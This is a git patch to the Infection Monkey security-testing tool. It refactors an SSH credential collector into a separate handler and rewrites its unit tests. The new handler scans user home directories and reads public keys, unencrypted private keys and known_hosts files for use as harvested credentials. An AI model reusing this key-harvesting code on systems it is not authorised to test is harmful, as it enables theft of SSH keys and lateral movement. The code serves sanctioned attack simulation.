From e9e5e95f49ae84571a46dade82c19c7f0679b112 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Tue, 15 Feb 2022 14:56:58 +0100
Subject: [PATCH] Agent, UT: Separate ssh_handler from SSH Credential Collector

* Add different UTs based on what ssh_handler returns
* Fix logic in SSH Credential Collector: return one Credentials object per
  user and skip empty usernames and missing keys
---
 .../SSH_credentials_collector.py              | 131 +++-------------
 .../ssh_collector/ssh_handler.py              | 112 ++++++++++++++
 .../ssh_info/ssh_info_full/id_12345           |   3 -
 .../ssh_info/ssh_info_full/id_12345.pub       |   1 -
 .../ssh_info/ssh_info_full/known_hosts        |   4 -
 .../ssh_info_no_public_key/giberrish_file.txt |   0
 .../ssh_info/ssh_info_partial/id_12345.pub    |   1 -
 .../test_ssh_credentials_collector.py         | 145 ++++++++----------
 8 files changed, 194 insertions(+), 203 deletions(-)
 create mode 100644 monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub

diff --git a/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py b/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
index 2e5eba0f7..778a5788a 100644
--- a/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
@@ -1,17 +1,13 @@
-import glob
 import logging
-import os
-import pwd
-from typing import Dict, Iterable
+from typing import Dict, Iterable, List
 
-from common.utils.attack_utils import ScanStatus
 from infection_monkey.credential_collectors import (
     Credentials,
     ICredentialCollector,
     SSHKeypair,
     Username,
 )
-from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
+from infection_monkey.credential_collectors.ssh_collector import ssh_handler
 
 logger = logging.getLogger(__name__)
 
@@ -21,121 +17,32 @@ class SSHCollector(ICredentialCollector):
     SSH keys and known hosts collection module
     """
 
-    default_dirs = ["/.ssh/", "/"]
-
-    def collect_credentials(self) -> Credentials:
+    def collect_credentials(self, _options=None) -> List[Credentials]:
         logger.info("Started scanning for SSH credentials")
-        home_dirs = SSHCollector._get_home_dirs()
-        ssh_info = SSHCollector._get_ssh_files(home_dirs)
+        ssh_info = ssh_handler.get_ssh_info()
         logger.info("Scanned for SSH credentials")
 
         return SSHCollector._to_credentials(ssh_info)
 
     @staticmethod
-    def _to_credentials(ssh_info: Iterable[Dict]) -> Credentials:
-        credentials_obj = Credentials(identities=[], secrets=[])
+    def _to_credentials(ssh_info: Iterable[Dict]) -> List[Credentials]:
+        ssh_credentials = []
 
         for info in ssh_info:
-            credentials_obj.identities.append(Username(info["name"]))
+            credentials_obj = Credentials(identities=[], secrets=[])
+
+            if "name" in info and info["name"] != "":
+                credentials_obj.identities.append(Username(info["name"]))
+
             ssh_keypair = {}
-            if "public_key" in info:
-                ssh_keypair["public_key"] = info["public_key"]
-            if "private_key" in info:
-                ssh_keypair["private_key"] = info["private_key"]
-            if "public_key" in info:
-                ssh_keypair["known_hosts"] = info["known_hosts"]
+            for key in ["public_key", "private_key", "known_hosts"]:
+                if key in info and info.get(key) is not None:
+                    ssh_keypair[key] = info[key]
 
-            credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
+            if len(ssh_keypair):
+                credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
 
-        return credentials_obj
+            if credentials_obj.identities != [] or credentials_obj.secrets != []:
+                ssh_credentials.append(credentials_obj)
 
-    @staticmethod
-    def _get_home_dirs() -> Iterable[Dict]:
-        root_dir = SSHCollector._get_ssh_struct("root", "")
-        home_dirs = [
-            SSHCollector._get_ssh_struct(x.pw_name, x.pw_dir)
-            for x in pwd.getpwall()
-            if x.pw_dir.startswith("/home")
-        ]
-        home_dirs.append(root_dir)
-        return home_dirs
-
-    @staticmethod
-    def _get_ssh_struct(name: str, home_dir: str) -> Dict:
-        """
-        Construct the SSH info. It consisted of: name, home_dir,
-        public_key, private_key and known_hosts.
-
-        public_key: contents of *.pub file (public key)
-        private_key: contents of * file (private key)
-        known_hosts: contents of known_hosts file(all the servers keys are good for,
-        possibly hashed)
-
-        :param name: username of user, for whom the keys belong
-        :param home_dir: users home directory
-        :return: SSH info struct
-        """
-        return {
-            "name": name,
-            "home_dir": home_dir,
-            "public_key": None,
-            "private_key": None,
-            "known_hosts": None,
-        }
-
-    @staticmethod
-    def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
-        for info in usr_info:
-            path = info["home_dir"]
-            for directory in SSHCollector.default_dirs:
-                if os.path.isdir(path + directory):
-                    try:
-                        current_path = path + directory
-                        # Searching for public key
-                        if glob.glob(os.path.join(current_path, "*.pub")):
-                            # Getting first file in current path with .pub extension(public key)
-                            public = glob.glob(os.path.join(current_path, "*.pub"))[0]
-                            logger.info("Found public key in %s" % public)
-                            try:
-                                with open(public) as f:
-                                    info["public_key"] = f.read()
-                                # By default private key has the same name as public,
-                                # only without .pub
-                                private = os.path.splitext(public)[0]
-                                if os.path.exists(private):
-                                    try:
-                                        with open(private) as f:
-                                            # no use from ssh key if it's encrypted
-                                            private_key = f.read()
-                                            if private_key.find("ENCRYPTED") == -1:
-                                                info["private_key"] = private_key
-                                                logger.info("Found private key in %s" % private)
-                                                T1005Telem(
-                                                    ScanStatus.USED, "SSH key", "Path: %s" % private
-                                                ).send()
-                                            else:
-                                                continue
-                                    except (IOError, OSError):
-                                        pass
-                                # By default, known hosts file is called 'known_hosts'
-                                known_hosts = os.path.join(current_path, "known_hosts")
-                                if os.path.exists(known_hosts):
-                                    try:
-                                        with open(known_hosts) as f:
-                                            info["known_hosts"] = f.read()
-                                            logger.info("Found known_hosts in %s" % known_hosts)
-                                    except (IOError, OSError):
-                                        pass
-                                # If private key found don't search more
-                                if info["private_key"]:
-                                    break
-                            except (IOError, OSError):
-                                pass
-                    except OSError:
-                        pass
-        usr_info = [
-            info
-            for info in usr_info
-            if info["private_key"] or info["known_hosts"] or info["public_key"]
-        ]
-        return usr_info
+        return ssh_credentials
diff --git a/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
new file mode 100644
index 000000000..30f1408a2
--- /dev/null
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
@@ -0,0 +1,112 @@
+import glob
+import logging
+import os
+import pwd
+from typing import Dict, Iterable
+
+from common.utils.attack_utils import ScanStatus
+from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
+
+logger = logging.getLogger(__name__)
+
+DEFAULT_DIRS = ["/.ssh/", "/"]
+
+
+def get_ssh_info() -> Iterable[Dict]:
+    home_dirs = _get_home_dirs()
+    ssh_info = _get_ssh_files(home_dirs)
+
+    return ssh_info
+
+
+def _get_home_dirs() -> Iterable[Dict]:
+    root_dir = _get_ssh_struct("root", "")
+    home_dirs = [
+        _get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() if x.pw_dir.startswith("/home")
+    ]
+    home_dirs.append(root_dir)
+    return home_dirs
+
+
+def _get_ssh_struct(name: str, home_dir: str) -> Dict:
+    """
+    Construct the SSH info struct. It consists of: name, home_dir,
+    public_key, private_key and known_hosts.
+
+    public_key: contents of the *.pub file (public key)
+    private_key: contents of the matching file without .pub (private key)
+    known_hosts: contents of the known_hosts file (all the servers the keys
+    are good for, possibly hashed)
+
+    :param name: username of user, for whom the keys belong
+    :param home_dir: users home directory
+    :return: SSH info struct
+    """
+    # TODO: There may be multiple public keys for a single user
+    # TODO: Authorized keys are missing.
+    return {
+        "name": name,
+        "home_dir": home_dir,
+        "public_key": None,
+        "private_key": None,
+        "known_hosts": None,
+    }
+
+
+def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
+    for info in usr_info:
+        path = info["home_dir"]
+        for directory in DEFAULT_DIRS:
+            # TODO: Use PATH
+            if os.path.isdir(path + directory):
+                try:
+                    current_path = path + directory
+                    # Searching for public key
+                    if glob.glob(os.path.join(current_path, "*.pub")):
+                        # TODO: There may be multiple public keys for a single user
+                        # Getting first file in current path with .pub extension(public key)
+                        public = glob.glob(os.path.join(current_path, "*.pub"))[0]
+                        logger.info("Found public key in %s" % public)
+                        try:
+                            with open(public) as f:
+                                info["public_key"] = f.read()
+                            # By default, private key has the same name as public,
+                            # only without .pub
+                            private = os.path.splitext(public)[0]
+                            if os.path.exists(private):
+                                try:
+                                    with open(private) as f:
+                                        # no use from ssh key if it's encrypted
+                                        private_key = f.read()
+                                        if private_key.find("ENCRYPTED") == -1:
+                                            info["private_key"] = private_key
+                                            logger.info("Found private key in %s" % private)
+                                            T1005Telem(
+                                                ScanStatus.USED, "SSH key", "Path: %s" % private
+                                            ).send()
+                                        else:
+                                            continue
+                                except (IOError, OSError):
+                                    pass
+                            # By default, known hosts file is called 'known_hosts'
+                            known_hosts = os.path.join(current_path, "known_hosts")
+                            if os.path.exists(known_hosts):
+                                try:
+                                    with open(known_hosts) as f:
+                                        info["known_hosts"] = f.read()
+                                        logger.info("Found known_hosts in %s" % known_hosts)
+                                except (IOError, OSError):
+                                    pass
+                            # If private key found don't search more
+                            if info["private_key"]:
+                                break
+                        except (IOError, OSError):
+                            pass
+                except OSError:
+                    pass
+    usr_info = [
+        info
+        for info in usr_info
+        if info["private_key"] or info["known_hosts"] or info["public_key"]
+    ]
+    return usr_info
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345 b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
deleted file mode 100644
index 54616cc11..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-LoremIpsumSomethingNothing
------END OPENSSH PRIVATE KEY-----
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
deleted file mode 100644
index 082f12abd..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 something-public-here valid.email@at-email.com
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
deleted file mode 100644
index 8e95ebb9a..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
+++ /dev/null
@@ -1,4 +0,0 @@
-|1|really+known+host|known_host1
-|1|really+known+host|known_host2
-|1|really+known+host|known_host3
-|1|really+known+host|known_host4
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt b/monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt
deleted file mode 100644
index e69de29bb..000000000
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub b/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub
deleted file mode 100644
index 082f12abd..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 something-public-here valid.email@at-email.com
diff --git a/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py b/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
index 8a7cda3c7..0225b07e2 100644
--- a/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
+++ b/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
@@ -1,94 +1,75 @@
-import os
-import pwd
-from pathlib import Path
-
-import pytest
-
-from infection_monkey.credential_collectors import SSHKeypair, Username
+from infection_monkey.credential_collectors import Credentials, SSHKeypair, Username
 from infection_monkey.credential_collectors.ssh_collector import SSHCollector
 
 
-@pytest.fixture
-def project_name(pytestconfig):
-    home_dir = str(Path.home())
-    return "/" / Path(str(pytestconfig.rootdir).replace(home_dir, ""))
-
-
-@pytest.fixture
-def ssh_test_dir(project_name):
-    return project_name / "monkey" / "tests" / "data_for_tests" / "ssh_info"
-
-
-@pytest.fixture
-def get_username():
-    return pwd.getpwuid(os.getuid()).pw_name
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_credentials_collector_success(ssh_test_dir, get_username, monkeypatch):
+def patch_ssh_handler(ssh_creds, monkeypatch):
     monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_full")],
+        "infection_monkey.credential_collectors.ssh_collector.ssh_handler.get_ssh_info",
+        lambda: ssh_creds,
     )
 
-    ssh_credentials = SSHCollector().collect_credentials()
 
-    assert len(ssh_credentials.identities) == 1
-    assert type(ssh_credentials.identities[0]) == Username
-    assert "username" in ssh_credentials.identities[0].content
-    assert ssh_credentials.identities[0].content["username"] == get_username
+def test_ssh_credentials_empty_results(monkeypatch):
+    patch_ssh_handler([], monkeypatch)
+    collected = SSHCollector().collect_credentials()
+    assert [] == collected
 
-    assert len(ssh_credentials.secrets) == 1
-    assert type(ssh_credentials.secrets[0]) == SSHKeypair
+    ssh_creds = [
+        {"name": "", "home_dir": "", "public_key": None, "private_key": None, "known_hosts": None}
+    ]
+    patch_ssh_handler(ssh_creds, monkeypatch)
+    expected = []
+    collected = SSHCollector().collect_credentials()
+    assert expected == collected
 
-    assert len(ssh_credentials.secrets[0].content) == 3
-    assert (
-        ssh_credentials.secrets[0]
-        .content["private_key"]
-        .startswith("-----BEGIN OPENSSH PRIVATE KEY-----")
+
+def test_ssh_info_result_parsing(monkeypatch):
+
+    ssh_creds = [
+        {
+            "name": "ubuntu",
+            "home_dir": "/home/ubuntu",
+            "public_key": "SomePublicKeyUbuntu",
+            "private_key": "ExtremelyGoodPrivateKey",
+            "known_hosts": "MuchKnownHosts",
+        },
+        {
+            "name": "mcus",
+            "home_dir": "/home/mcus",
+            "public_key": "AnotherPublicKey",
+            "private_key": "NotSoGoodPrivateKey",
+            "known_hosts": None,
+        },
+        {
+            "name": "",  # no username -> no identity expected, only a secret
+            "home_dir": "/",
+            "public_key": None,
+            "private_key": None,
+            "known_hosts": "VeryGoodHosts",
+        },
+    ]
+    patch_ssh_handler(ssh_creds, monkeypatch)
+
+    # Expected credentials
+    username = Username("ubuntu")
+    username2 = Username("mcus")
+
+    ssh_keypair1 = SSHKeypair(
+        {
+            "public_key": "SomePublicKeyUbuntu",
+            "private_key": "ExtremelyGoodPrivateKey",
+            "known_hosts": "MuchKnownHosts",
+        }
     )
-    assert (
-        ssh_credentials.secrets[0]
-        .content["public_key"]
-        .startswith("ssh-ed25519 something-public-here")
+    ssh_keypair2 = SSHKeypair(
+        {"public_key": "AnotherPublicKey", "private_key": "NotSoGoodPrivateKey"}
     )
-    assert ssh_credentials.secrets[0].content["known_hosts"].startswith("|1|really+known+host")
+    ssh_keypair3 = SSHKeypair({"known_hosts": "VeryGoodHosts"})
 
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_no_ssh_credentials(monkeypatch):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs", []
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.identities) == 0
-    assert len(ssh_credentials.secrets) == 0
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_collector_partial_credentials(monkeypatch, ssh_test_dir):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_partial")],
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.secrets[0].content) == 3
-    assert ssh_credentials.secrets[0].content["private_key"] is None
-    assert ssh_credentials.secrets[0].content["known_hosts"] is None
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_collector_no_public_key(monkeypatch, ssh_test_dir):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_no_public_key")],
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.identities) == 0
-    assert len(ssh_credentials.secrets) == 0
+    expected = [
+        Credentials(identities=[username], secrets=[ssh_keypair1]),
+        Credentials(identities=[username2], secrets=[ssh_keypair2]),
+        Credentials(identities=[], secrets=[ssh_keypair3]),
+    ]
+    collected = SSHCollector().collect_credentials()
+    assert expected == collected